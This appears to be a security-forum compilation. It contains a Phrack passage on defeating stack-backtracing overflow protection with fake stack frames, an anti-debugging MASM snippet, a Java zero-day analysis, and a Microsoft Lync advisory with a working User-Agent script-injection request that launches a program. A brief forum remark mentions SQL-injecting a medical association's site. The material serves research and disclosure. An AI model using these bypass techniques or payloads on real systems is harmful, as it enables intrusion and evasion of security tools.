memory for a 0xC3 opcode.

Here is an illustration of a normal LoadLibrary("kernel32.dll") call
that originates from a writable memory segment:

    push kernel32_string
    call LoadLibrary
return_eip:
    . . .

LoadLibrary:            ; * see below for a stack illustration
    . . .
    ret                 ; return to stack-based return_eip

    |------------------------------|
    | address of "kernel32.dll" str|
    |------------------------------|
    | return address (return_eip)  |
    |------------------------------|

As explained before, the buffer overflow protection code executes
before LoadLibrary gets to run. Since the return address (return_eip)
is in a writable memory segment, the protection code logs the
overflow and terminates the process.

The next example illustrates the 'proxy through a "ret" instruction'
technique:

    push return_eip
    push kernel32_string            ; fake "call LoadLibrary" call
    push address_of_ret_instruction
    jmp LoadLibrary
return_eip:
    . . .

LoadLibrary:            ; * see below for a stack illustration
    . . .
    ret                 ; return to non stack-based
                        ; address_of_ret_instruction

address_of_ret_instruction:
    . . .
    ret                 ; return to stack-based return_eip

Once again, the buffer overflow protection code executes before
LoadLibrary gets to run. This time though, the stack is set up with a
return address pointing to a non-writable memory segment. In
addition, the ebp register is not present on the stack, thus the
protection code cannot perform stack backtracing and determine that
the return address in the next stack frame points to a writable
segment. This allows the shellcode to call LoadLibrary, which returns
to the "ret" instruction. In its turn, the "ret" instruction pops the
next return address off the stack (return_eip) and transfers control
to it.
    |------------------------------|
    | return address (return_eip)  |
    |------------------------------|
    | address of "kernel32.dll" str|
    |------------------------------|
    | address of "ret" instruction |
    |------------------------------|

In addition, any number of arbitrarily complex fake stack frames can
be set up to further confuse the protection code. Here is an example
of a fake frame that uses a "ret 8" instruction instead of a simple
"ret":

    |--------------------------------|
    | return address                 |
    |--------------------------------|
    | address of "ret" instruction   | <- fake frame 2
    |--------------------------------|
    | any value                      |
    |--------------------------------|
    | address of "kernel32.dll" str  |
    |--------------------------------|
    | address of "ret 8" instruction | <- fake frame 1
    |--------------------------------|

This causes an extra 32-bit value to be removed from the stack,
complicating any kind of analysis even further.

--[ 5 - Conclusions

The majority of commercial security systems do not actually prevent
buffer overflows but rather detect the execution of shellcode. The
most common technology used to detect shellcode is code page
permission checking, which relies on stack backtracing. Stack
backtracing involves traversing stack frames and verifying that the
return addresses do not originate from writable memory segments such
as stack or heap areas.

The paper presents a number of different ways to bypass both userland
and kernel based stack backtracing. These range from tampering with
function preambles to creating fake stack frames. In conclusion, the
majority of current buffer overflow protection implementations are
flawed, providing a false sense of security and little real
protection against determined attackers.

Appendix A: Entercept 4.1 Hooks

Entercept hooks a number of functions in userland and in the kernel.
Here is a list of the currently hooked functions as of Entercept 4.1.
User Land

msvcrt.dll
    _creat  _read  _write  system

kernel32.dll
    CreatePipe  CreateProcessA  GetProcAddress  GetStartupInfoA
    LoadLibraryA  PeekNamedPipe  ReadFile  VirtualProtect
    VirtualProtectEx  WinExec  WriteFile

advapi32.dll
    RegOpenKeyA

rpcrt4.dll
    NdrServerInitializeMarshall

user32.dll
    ExitWindowsEx

ws2_32.dll
    WPUCompleteOverlappedRequest  WSAAddressToStringA
    WSACancelAsyncRequest  WSACloseEvent  WSAConnect  WSACreateEvent
    WSADuplicateSocketA  WSAEnumNetworkEvents  WSAEventSelect
    WSAGetServiceClassInfoA  WSCInstallNameSpace

wininet.dll
    InternetSecurityProtocolToStringW  InternetSetCookieA
    InternetSetOptionExA

lsasrv.dll
    LsarLookupNames  LsarLookupSids2

msv1_0.dll
    Msv1_0ExportSubAuthenticationRoutine
    Msv1_0SubAuthenticationPresent

Kernel

    NtConnectPort  NtCreateProcess  NtCreateThread  NtCreateToken
    NtCreateKey  NtDeleteKey  NtDeleteValueKey  NtEnumerateKey
    NtEnumerateValueKey  NtLoadKey  NtLoadKey2  NtQueryKey
    NtQueryMultipleValueKey  NtQueryValueKey  NtReplaceKey
    NtRestoreKey  NtSetValueKey  NtMakeTemporaryObject
    NtSetContextThread  NtSetInformationProcess  NtSetSecurityObject
    NtTerminateProcess

Appendix B: Okena/Cisco CSA 3.2 Hooks

Okena/CSA hooks many functions in userland but far fewer in the
kernel. A lot of the userland hooks are the same ones that Entercept
hooks. However, almost all of the functions Okena/CSA hooks in the
kernel are related to altering keys in the Windows registry.
Okena/CSA does not seem as concerned as Entercept about backtracing
calls in the kernel. This leads to an interesting vulnerability, left
as an exercise to the reader.
User Land

kernel32.dll
    CreateProcessA  CreateProcessW  CreateRemoteThread  CreateThread
    FreeLibrary  LoadLibraryA  LoadLibraryExA  LoadLibraryExW
    LoadLibraryW  LoadModule  OpenProcess  VirtualProtect
    VirtualProtectEx  WinExec  WriteProcessMemory

ole32.dll
    CoFileTimeToDosDateTime  CoGetMalloc  CoGetStandardMarshal
    CoGetState  CoResumeClassObjects  CreateObjrefMoniker
    CreateStreamOnHGlobal  DllGetClassObject  StgSetTimes
    StringFromCLSID

oleaut32.dll
    LPSAFEARRAY_UserUnmarshal

urlmon.dll
    CoInstall

Kernel

    NtCreateKey  NtOpenKey  NtDeleteKey  NtDeleteValueKey
    NtSetValueKey  NtOpenProcess  NtWriteVirtualMemory

|=[ EOF ]=---------------------------------------------------------------=|

Source: .:: Phrack Magazine ::.
  15. Security Mitigations for Return-Oriented Programming Attacks

Piotr Bania
Kryptos Logic Research, 2010

Abstract

With the discovery of new exploit techniques, new protection
mechanisms are needed as well. Mitigations like DEP (Data Execution
Prevention) or ASLR (Address Space Layout Randomization) created a
significantly more difficult environment for vulnerability
exploitation. Attackers, however, have recently developed new
exploitation methods which are capable of bypassing the operating
system's security protection mechanisms. In this paper we present a
short summary of novel and known mitigation techniques against
return-oriented programming (ROP) attacks. The techniques described
in this article are related mostly to x86-32 processors and Microsoft
Windows operating systems.

Download: kryptoslogic.com/download/ROP_Whitepaper.pdf
  16. The Tor Software Ecosystem

Description: THE TOR SOFTWARE ECOSYSTEM

At the very beginning, Tor was just a socks proxy that protected the
origin and/or destination of your TCP flows. Now the broader Tor
ecosystem includes a diverse set of projects -- browser extensions to
patch Firefox and Thunderbird's privacy issues, Tor controller
libraries to let you interface with the Tor client in your favorite
language, network scanners to measure relay performance and look for
misbehaving exit relays, LiveCDs, support for the way Android
applications expect Tor to behave, full-network simulators and
testing frameworks, plugins to make Tor's traffic look like Skype or
other protocols, and metrics and measurement tools to keep track of
how well everything's working. Many of these tools aim to be useful
beyond Tor: making them modular means they're reusable for other
anonymity and security projects as well.

In this talk, Roger and Jake will walk you through all the tools that
make up the Tor software world, and give you a better understanding
of which ones need love and how you can help.

Disclaimer: We are an infosec video aggregator and this video is
linked from an external website. The original author may be different
from the user re-posting/linking it here. Please do not assume the
authors to be same without verifying.

Original Source:

Source: The Tor Software Ecosystem
  17. Static Analysis Of Java Class Files For Quickly And Accurately
      Detecting Web-Language Encoding Methods

Description:

Abstract

Attacks such as Cross-Site Scripting, HTTP header injection, and SQL
injection take advantage of weaknesses in the way some web
applications handle incoming character strings. One technique for
defending against injection vulnerabilities is to sanitize untrusted
strings using encoding methods. These methods convert the reserved
characters in a string to an inert representation which prevents
unwanted side effects. However, encoding methods which are
insufficiently thorough or improperly integrated into applications
can pose a significant security risk. This paper will outline an
algorithm for identifying encoding methods through automated analysis
of Java bytecode. The approach combines an efficient heuristic search
with selective rebuilding and execution of likely candidates. This
combination provides a scalable and accurate technique for
identifying and profiling code that could constitute a serious
weakness in an application.

*****

Speakers

Arshan Dabirsiaghi, Aspect Security

Matthew Paisner, Aspect Security

Alex Emsellem, Intern Software Engineer, Aspect Security
Currently pursuing a bachelor's degree in Computer Science. I'm
primarily focused on software reverse engineering and exploitation.
Around ten years ago I found my first vulnerability in a web
application, and remember it vividly. I live for innovative ideas and
the cutting-edge.

Disclaimer: We are an infosec video aggregator and this video is
linked from an external website. The original author may be different
from the user re-posting/linking it here. Please do not assume the
authors to be same without verifying.

Original Source: Static Analysis of Java Class Files for Quickly and
Accurately Detecting Web-Language Encoding Methods on Vimeo

Source: Static Analysis Of Java Class Files For Quickly And
Accurately Detecting Web-Language Encoding Methods
  18. Wtf - Waf Testing Framework

Description:

Abstract

We will be presenting a new approach to evaluating web application
firewall capabilities that is suitable to the real world use case.
Our methodology touches on issues like False Positive / False
Negative rates, evasion techniques and white listing / black listing
balance. We will demonstrate a tool that can be used by organizations
to implement the methodology either when choosing an application
protection solution or after deployment.

*****

Speakers

Yaniv Azaria, Security Research Team Leader, Imperva Inc.
Yaniv holds a B.Sc and M.Sc in Computer Science. An industry veteran
with experience in developing web applications, bio-informatic
algorithms and database security products. Was team leader for
database security research at Imperva for 3 years and for the past
couple of years has conducted general database and application
security research.

Amichai Shulman, Co-Founder and CTO of Imperva, Inc.
Co-founder and CTO of Imperva Inc with 20 years of information
security experience in the military and corporate world. Leading our
research group in the areas of vulnerability research as well as
hacker intelligence. Holds B.Sc and M.Sc in Computer Science.

Disclaimer: We are an infosec video aggregator and this video is
linked from an external website. The original author may be different
from the user re-posting/linking it here. Please do not assume the
authors to be same without verifying.

Original Source: WTF - WAF Testing Framework - Yaniv Azaria and
Amichai Shulman on Vimeo

Source: Wtf - Waf Testing Framework
  19. Undocumented API use - NtSetInformationThread

Author: drew77

; Use of the still undocumented NtSetInformationThread.

.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc
include \masm32\include\ntdll.inc
include \masm32\macros\macros.asm

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\ntdll.lib

.data
Failed db "Busted.",0
Sample db " ",0

.code
start:
    ; When the function is called, the thread will continue to
    ; run but a debugger will no longer receive any events
    ; related to that thread. Among the missing events are that
    ; the process has terminated, if the main thread is the
    ; hidden one. This technique is used by HyperUnpackMe2,
    ; among others.
    invoke NtSetInformationThread, -2, 11h, NULL, NULL

    ; as of Saturday, January 12, 2013, STILL undocumented
    ; Details at hxxp://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/NtSetInformationThread.html

    ; thread detached if debugged
    ;invoke MessageBox, 0, ADDR Failed, ADDR Sample, MB_ICONINFORMATION

    invoke ExitProcess, 0
end start

Source: Undocumented API use - NtSetInformationThread - rohitab.com - Forums
  20. Packet Fence 3.6.1

Site: packetfence.org

PacketFence is a network access control (NAC) system. It is actively
maintained and has been deployed in numerous large-scale
institutions. It can be used to effectively secure networks, from
small to very large heterogeneous networks. PacketFence provides
NAC-oriented features such as registration of new network devices,
detection of abnormal network activities including from remote snort
sensors, isolation of problematic devices, remediation through a
captive portal, and registration-based and scheduled vulnerability
scans.

Download: http://packetstormsecurity.com/files/download/119507/packetfence-3.6.1.tar.gz

Source: Packet Fence 3.6.1 - Packet Storm
  21. This write up documents an analysis of the current Java
      zero-day floating around that affects version 7 update 10.

Hello All,

We were notified today of ongoing attacks with the use of a new Java
vulnerability affecting the latest version 7 Update 10 of the
software [1][2]. Due to the unpatched status of Issue 50 [3] and some
inquiries received regarding whether the attack code found exploited
this bug, we had a quick look at the exploit code found in the wild.
Below, we are providing you with the results of our analysis.

The 0-day attack code that was spotted in the wild today is yet
another instance of Java security vulnerabilities that stem from an
insecure implementation of the Reflection API [4].

The new attack is a combination of two vulnerabilities. The first
flaw allows loading arbitrary (restricted) classes by the means of
the findClass method of the com.sun.jmx.mbeanserver.MBeanInstantiator
class. This can be accomplished by the means of this code:

public static Class loadClass(String name) throws Throwable {
    JmxMBeanServerBuilder jmxbsb = new JmxMBeanServerBuilder();
    JmxMBeanServer jmxbs = (JmxMBeanServer)
        jmxbsb.newMBeanServer("", null, null);
    MBeanInstantiator mbi = jmxbs.getMBeanInstantiator();
    return mbi.findClass(name, (ClassLoader) null);
}

The problem stems from an insecure call to the Class.forName()
method.

The second issue abuses the new Reflection API to successfully obtain
and call MethodHandle objects that point to methods and constructors
of restricted classes. This second issue relies on the
invokeWithArguments method call of the java.lang.invoke.MethodHandle
class, which has already been the subject of a security problem
(Issue 32, which we reported to Oracle on Aug 31, 2012). The company
had released a fix for Issue 32 in Oct 2012. However, it turns out
that the fix was not complete, as one can still abuse
invokeWithArguments to set up calls to invokeExact with a trusted
system class as the target method caller.
This time, however, the call is made to methods of the new Reflection API (from the java.lang.invoke.* package), many of which rely on security checks conducted against the caller of the target method.

Oracle's fix for Issue 32 relies on binding the MethodHandle object to the caller of a target method / constructor if it denotes a potentially dangerous Reflection API call. This binding takes the form of injecting an extra stack frame from the caller's Class Loader namespace into the call stack prior to issuing a security-sensitive method call. Calls to blacklisted Reflection APIs are detected with the use of the isCallerSensitive method of the MethodHandleNatives class. The blacklisting, however, focuses primarily on the Core Reflection API (Class.forName(), Class.getMethods(), etc.) and does not take into account the possibility of using new Reflection API calls. As a result, the invokeWithArguments trampoline used in the context of a system (privileged) lookup object may still be abused for gaining access to restricted classes, their methods, etc.

The above is important in the context of a security check implemented by the Lookup class. Its checkSecurityManager method compares the Class Loader (CL) namespace of the caller class of a target find* method (findStatic, findVirtual, etc.) with the CL namespace of the class for which a given find operation is conducted. Access to restricted packages is not checked only if the Class Loader namespaces are equal (the case for the public lookup object, but also for a trusted method caller such as invokeWithArguments invoked for a method that is not blacklisted).

The exploit vector used by the attack code is the same as the one we used for the second instance of our Proof of Concept code for Issue 32 (reported to Oracle on 17-Sep-2012). This exploit vector relies on the sun.org.mozilla.javascript.internal.GeneratedClassLoader class in order to define a fully privileged attacker's class in a system Class Loader namespace.
From that point, all security checks can be easily disabled.

This is not the first time Oracle has failed to "sync" the security of the Core and new Reflection APIs (just to mention the Reflection API filter). This is also not the first time Oracle's own investigation / analysis of security issues has turned out to be insufficiently comprehensive (just to mention Issue 50, which was discovered in code addressed by the company not so long ago...).

Bugs are like mushrooms: in many cases they can be found in close proximity to those already spotted. It looks like Oracle either stopped the picking too early or they are still deep in the woods...

Thank you.

Best Regards,
Adam Gowdiak

---------------------------------------------
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
---------------------------------------------

References:
[1] Malware don't need Coffee: 0 day 1.7u10 spotted in the Wild - Disable Java Plugin NOW!
http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html
[2] New year, new Java zeroday!
http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/
[3] [SE-2012-01] Critical security issue affecting Java SE 5/6/7
http://seclists.org/fulldisclosure/2012/Sep/170
[4] SE-2012-01 Details
http://www.security-explorations.com/en/SE-2012-01-details.html

Via: Java Zero-Day Analysis - Packet Storm
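To make the invokeWithArguments trampoline discussed in the analysis above concrete, here is a small, benign sketch (not part of the original exploit; the class name and target method, Integer.parseInt, are harmless stand-ins chosen for illustration) showing how a MethodHandle resolved through a Lookup object is invoked via invokeWithArguments:

```java
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;

public class InvokeWithArgumentsDemo {

    // Resolve Integer.parseInt(String) as a MethodHandle via a Lookup
    // object, then call it through invokeWithArguments -- the same
    // trampoline the analysis describes, here used on an unrestricted,
    // public method.
    public static Object callParseInt(String s) throws Throwable {
        MethodHandles.Lookup lookup = MethodHandles.lookup();
        MethodHandle mh = lookup.findStatic(
                Integer.class, "parseInt",
                MethodType.methodType(int.class, String.class));
        // Unlike the exact-typed invokeExact, invokeWithArguments
        // performs automatic boxing/unboxing and argument collection.
        return mh.invokeWithArguments(s);
    }

    public static void main(String[] args) throws Throwable {
        System.out.println(callParseInt("42")); // prints 42
    }
}
```

The security relevance lies in who the access checks see as the caller: the find* methods check against the lookup class, and the attack abuses a trusted (system) caller context to resolve handles to restricted classes that an applet could never resolve directly.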
  22. [h=2]Microsoft Lync 2010 Code Execution Vulnerability[/h]

Summary
=======
Microsoft Lync 2010 fails to properly sanitize user-supplied input, which can lead to remote code execution. Microsoft was originally notified of this issue on December 11, 2012. The details of this issue were made public on January 11, 2013.

CVE number: Not Assigned
Impact: Low
Vendor homepage: http://lync.microsoft.com/
Vendor notified: December 11, 2012
Vendor fixed: N/A
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed in Microsoft Lync Server 2010, version 4.0.7577.0. Other versions may also be affected.

Details
=======
Microsoft Lync 2010, version 4.0.7577.4087, fails to sanitize the "User-Agent" header for meet.domainname.com. By inserting JavaScript into the aforementioned parameter and stacking commands, an attacker can execute arbitrary commands in the context of the application.

Impact
======
Malicious users could execute arbitrary applications on client systems, compromising the confidentiality, integrity, and availability of information on the client system.

Solution
========
The vendor should implement thorough input validation in order to remove dangerous characters from user-supplied data. Additionally, the vendor should implement thorough output encoding in order to display, rather than execute, dangerous characters within the browser.

Proof-of-Concept (PoC)
======================
The following request is included as a proof of concept. It is designed to open notepad.exe when the request is received by the server.
GET /christopher.emerson/JW926520 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"
Host: meet.domainname.com
Connection: Keep-Alive
Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=Christopher

Below is an abbreviated copy of the response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-MS-Server-Fqdn: domainname.com
X-Powered-By: ASP.NET
Date: Mon, 07 May 2012 20:26:55 GMT
Connection: keep-alive
Content-Length: 23901

<!--NOTE: If DOCTYPE element is present, it causes the iFrame to be displayed in a small-->
<!--portion of the browser window instead of occupying the full browser window.-->
<html xmlns="http://www.w3.org/1999/xhtml" class="reachJoinHtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=10; IE=9; IE=8; requiresActiveX=true" />
<title>Microsoft Lync</title>
<script type="text/javascript">
var reachURL = "https:// 
domainname.com/Reach/Client/WebPages/ReachJoin.aspx?xml=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48Y29uZi1pbmZvIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3J0Yy8yMDA5LzA1L3NpbXBsZWpvaW5jb25mZG9jIj48Y29uZi11Y21rLXNpcDpjaHJpc3RvcGhlci5lbWVyc29uQGRvbWFpbm5hbWUuY29tO2dydXU7b3BhcXVlPWFwcDpjb25mOmZvY3VzOmlkOkpXOTI2NTIwPC9jb25mLXVyaT48c2VydmVyLXRpbWU+OTEuODAwNDwvc2VydmVyLXRpbWU+PG9yaWdpbmFsLWluY29taW5nLXVybD5odHRwczovL21lZXQuZG9tYWlubmFtZS5jb20vY2hyaXN0b3BoZXIuZW1lcnNvbi9KVzkyNjUyMDwvb3JpZ2luYWwtaW5jb21pbmctdWNtdy08Y29uZi1rZXk+Slc5MjY1MjA8L2NvbmYta2V5PjwvY29uZi1pbmZiejQh"; var escapedXML = "'\x3c\x3fxml version\x3d\x221.0\x22 encoding\x3d\x22utf-8\x22\x3f\x3e\x3cconf-info xmlns\x3axsi\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema-instance\x22 xmlns\x3axsd\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema\x22 xmlns\x3d\x22http\x3a\x2f\x2fschemas.microsoft.com\x2frtc\x2f2009\x2f05\x2fsimplejoinconfdoc\x22\x3e\x3cconf-uri\x3esip\x3achristopher.emerson\x40 domainname.com \x3bgruu\x3bopaque\x3dapp\x3aconf\x3afocus\x3aid\x3aJW926520\x3c\x2fconf-uri\x3e\x3cserver-time\x3e91.8004\x3c\x2fserver-time\x3e\x3coriginal-incoming-url\x3ehttps\x3a\x2f\ x2fmeet.domainname.com \x2fchristopher.emerson\x2fJW926520\x3c\x2foriginal-incoming-url\x3e\x3cconf-key\x3eJW926520\x3c\x2fconf-key\x3e\x3c\x2fconf-info\x3e'"; var showJoinUsingLegacyClientLink = "False"; var validMeeting = "True"; var reachClientRequested = "False"; var currentLanguage = "en-US"; var reachClientProductName = "Lync Web App"; var crackUrlRequest = "True"; var isNokia = "False"; var isAndroid = "False"; var isWinPhone = "False"; var isIPhone = "False"; var isIPad = "False"; var isMobile = "False"; var isUnsupported = "False"; var domainOwnerJoinLauncherUrl = ""; var lyncLaunchLink = "conf:sip:christopher.emerson@ domainname.com 
;gruu;opaque=app:conf:focus:id:JW926520%3Frequired-media=audio";
var errorCode = "-1";
var diagInfo = "Machine:MachineNameBrowserId:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"Join attempted at:5/7/2012 3:26:55 PM";
var resourceUrl = "/meet/JavaScriptResourceHandler.ashx?lcs_se_w14_onprem4.0.7577.197&language=";

Vendor Statement
================
The vulnerability described in this report is an XSS vulnerability in the User-Agent header, which requires an attacker to be in a man-in-the-middle position in order to modify the User-Agent. In a default configuration of Lync Server, TLS encryption is used to protect against this type of attack. Customers concerned about this issue should check their environments to ensure that Lync is configured to use TLS to encrypt all traffic, which is the default configuration.

Disclosure Timeline
===================
December 11, 2012: Disclosed to vendor (Microsoft Security Response Center).
December 18, 2012: Vendor's initial response.
December 20, 2012: Vendor deemed the issue Low severity and confirmed it would be fixed in the next product release.
December 27, 2012: Received vendor approval to disclose, along with the Vendor Statement (see above).
January 11, 2013: Disclosed vulnerability publicly (http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header).

=====================================================================
# 3C8F2163853A5DE5 1337day.com [2013-01-13] 1A58B10CEE71628B #
Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
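The output-encoding mitigation suggested in the Solution section can be sketched as follows. This is an illustrative example only, assuming nothing about Microsoft's actual code: the class, method name, and character whitelist are invented for the sketch. The idea is that a reflected header value is encoded so that quotes and backslashes cannot terminate the surrounding JavaScript string literal, keeping the injected payload inert:

```java
public class HeaderEncodingDemo {

    // Illustrative encoder (hypothetical, not the vendor's code):
    // emit letters, digits, and a few clearly safe punctuation
    // characters verbatim; encode everything else (quotes, backslashes,
    // angle brackets, equals signs, ...) as a backslash-u hex escape so
    // the value can never break out of a quoted JavaScript string.
    public static String encodeForJsString(String input) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            if (Character.isLetterOrDigit(c) || " .,:;/-()".indexOf(c) >= 0) {
                out.append(c);
            } else {
                out.append(String.format("\\u%04x", (int) c));
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // The PoC relies on a literal double quote to break out of the
        // diagInfo string; after encoding, the quote is neutralized.
        String ua = "Mozilla/4.0\";var oShell = new ActiveXObject(\"Shell.Application\");";
        System.out.println(encodeForJsString(ua));
    }
}
```

With this kind of encoding in place, the double quote in the PoC's User-Agent becomes an escape sequence inside the string literal rather than a string terminator, so the appended ActiveXObject payload is displayed as data instead of being executed.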
  23. That was just irony, mister Tinkode fan. In order to spend 5 minutes finding a SQL injection in a site, you first have to choose the site, right? You chose "Asociatia Asistentilor Medicali din Banat". All I asked you was: "WHY?". You must have a reason, right? Or was it just a dork, and these "scoundrels" happened to land in the first Google results? My question is simple: "What is the reason you chose this site?".
  24. Wow, what "targets"... How do you find them?
  25. Or learn C/C++ and you'll be able to program for your fridge or your microwave oven too...